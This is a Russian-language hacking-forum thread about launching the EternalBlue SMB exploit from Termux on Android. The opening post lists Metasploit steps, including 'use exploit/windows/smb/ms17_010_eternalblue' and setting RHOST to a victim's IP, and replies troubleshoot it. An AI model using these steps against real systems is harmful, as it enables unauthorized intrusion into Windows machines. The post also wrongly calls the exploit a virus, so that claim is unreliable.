• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Решено EternalBlue на Termux

X

Xyrox

Во-первых, что такое Termux.
Termux - это терминал с множеством пакетов, как тот же самый git или nmap.
В общем, у Termux'а очень много полезных фич для пентеста и для простого хакинга.
Я копался по Codeby, пытался прочитать логи, ибо я криворукий и уже закинув на всю эту затею, я залез поискать в интернете что нибудь поинтересней. И я нашёл такой вирус, как EternalBlue, за который нужно благодарить хаккерскую группу The Shadow Brokers.
Сегодня я буду пытаться эксплуатировать уязвимость нашего EternalBlue на терминале Termux.
1) Устанавливаем сам Termux из Play Маркета.
2) Открываем терминал и прописываем команду: pkg install curl
3) После этого прописываем curl -LO
Ссылка скрыта от гостей

4) Жди пока он будет оч долго грузится, а потом прописываем msfconsole.
5) Пятым делом прописываем use exploit/windows/smb/ms17_010_eternalblue
6) Set RHOST локальный ip жертвы.
Вот и все шаги, проверяйте, показывайте результаты, может я где-то мог сделать ошибку.
 
  • Нравится
Реакции: сергей м, Magic_Salat, vanka и ещё 5
P

persikoff

@Xyrox, в чем проблема?
 

Вложения

  • IMG_20190803_175929.jpg
    IMG_20190803_175929.jpg
    149,5 КБ · Просмотры: 868
KJhgIO

KJhgIO

Заблокирован
02.08.2018
72
30
BIT
0
Tim Pumpkin сказал(а):
А можно эту фигню для взлома андроид использовать?
Нажмите, чтобы раскрыть...

Если вы про еnternablue, то его НЕЛЬЗЯ использовать для взлома андройд.
Этот эксплоит использует уязвимости SMB протокола в WINDOWS! Он нацелен исключительно на ОС Windows и может эксплуатировать только её.

Что касаемо msf - meterpreter в руки.
Эксплоиты для сетевого стека Android в MSF не наблюдал.
Благо в открытом доступе есть обширные бд эксплоитов, уязвимостей. А дальше уже сами :)
 
  • Нравится
Реакции: Tim Pumpkin
Timofey

Timofey

New member
16.12.2019
1
0
BIT
0
Почему возникает такая ошибка?
 

Вложения

  • Screenshot_2019-12-23-18-45-03-757_com.termux.jpg
    Screenshot_2019-12-23-18-45-03-757_com.termux.jpg
    155,8 КБ · Просмотры: 587
ThePavlov

ThePavlov

New member
21.11.2019
2
0
BIT
0
тема странная, но мне всегда было интересно, это работает только в локальной сети? или нет
 
swagcat228

swagcat228

Заблокирован
19.12.2019
341
86
BIT
0
Xyrox сказал(а):
Во-первых, что такое Termux.
Termux - это терминал с множеством пакетов, как тот же самый git или nmap.
В общем, у Termux'а очень много полезных фич для пентеста и для простого хакинга.
Я копался по Codeby, пытался прочитать логи, ибо я криворукий и уже закинув на всю эту затею, я залез поискать в интернете что нибудь поинтересней. И я нашёл такой вирус, как EternalBlue, за который нужно благодарить хаккерскую группу The Shadow Brokers.
Сегодня я буду пытаться эксплуатировать уязвимость нашего EternalBlue на терминале Termux.
1) Устанавливаем сам Termux из Play Маркета.
2) Открываем терминал и прописываем команду: pkg install curl
3) После этого прописываем curl -LO
Ссылка скрыта от гостей

4) Жди пока он будет оч долго грузится, а потом прописываем msfconsole.
5) Пятым делом прописываем use exploit/windows/smb/ms17_010_eternalblue
6) Set RHOST локальный ip жертвы.
Вот и все шаги, проверяйте, показывайте результаты, может я где-то мог сделать ошибку.
Нажмите, чтобы раскрыть...
Лучше поставить arm версию kali, в том же термуксе, запустить ёё посредством chroot или proot
и оттуда, из под кали, уже поставить себе нормальный людской msf
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ